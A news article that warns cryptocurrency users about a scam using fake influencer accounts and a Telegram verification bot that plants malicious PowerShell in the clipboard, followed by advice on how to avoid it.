A new and complex scam is targeting cryptocurrency users, exploiting fake Telegram groups and malicious verification bots to steal private information and cryptocurrency. This scam has beem identified by cybersecurity experts as a dangerous blend of impersonation, social engineering, and malware deployment.
The fraud begins with scammers creating counterfeit social media accounts that closely resemble those of popular crypto influencers.
These accounts interact with legitimate posts, inviting users to join Telegram groups that promise insider tips or exclusive investment opportunities. Once inside the group, users are instructed to complete a verification process through a bot named “OfficiaISafeguardBot.”
The verification process, designed to appear legitimate, manipulates users into acting quickly by imposing a narrow time limit. However, instead of verifying identities, the bot injects malicious PowerShell code into the user’s clipboard.
If executed, this code downloads malware that can take control of the user’s device, compromise sensitive data, and steal private keys associated with cryptocurrency wallets.
Cybersecurity platform VirusTotal has flagged the malware as harmful, and reports have surfaced of victims losing access to their crypto holdings. This scam highlights the evolving methods fraudsters and bad actors in general use to exploit cryptocurrency users, moving beyond traditional phishing tactics to include advanced technological tools.
Read also: DeFi platform Delta Prime loses $6M in latest security breach.
To avoid becoming a victim, they key will be to remain cautious. Since Telegram groups are popular gathering spots, crypto users should be wary of joining or interacting with unverified groups or accounts that impersonate influencers.
Refrain from executing unfamiliar commands or installing untrusted software or apps, and consider using hardware wallets to securely store cryptocurrency.
As the crypto space continues to attract innovative technologies, it also draws increasingly sophisticated scams. Sharing knowledge about these threats is key to protecting the growing number of users entering the digital currency market.
Earlier in the year, Binance reported a malware that manipulates users clipboards, altering the wallets copied into it to a hacker’s address, resulting in financial loss.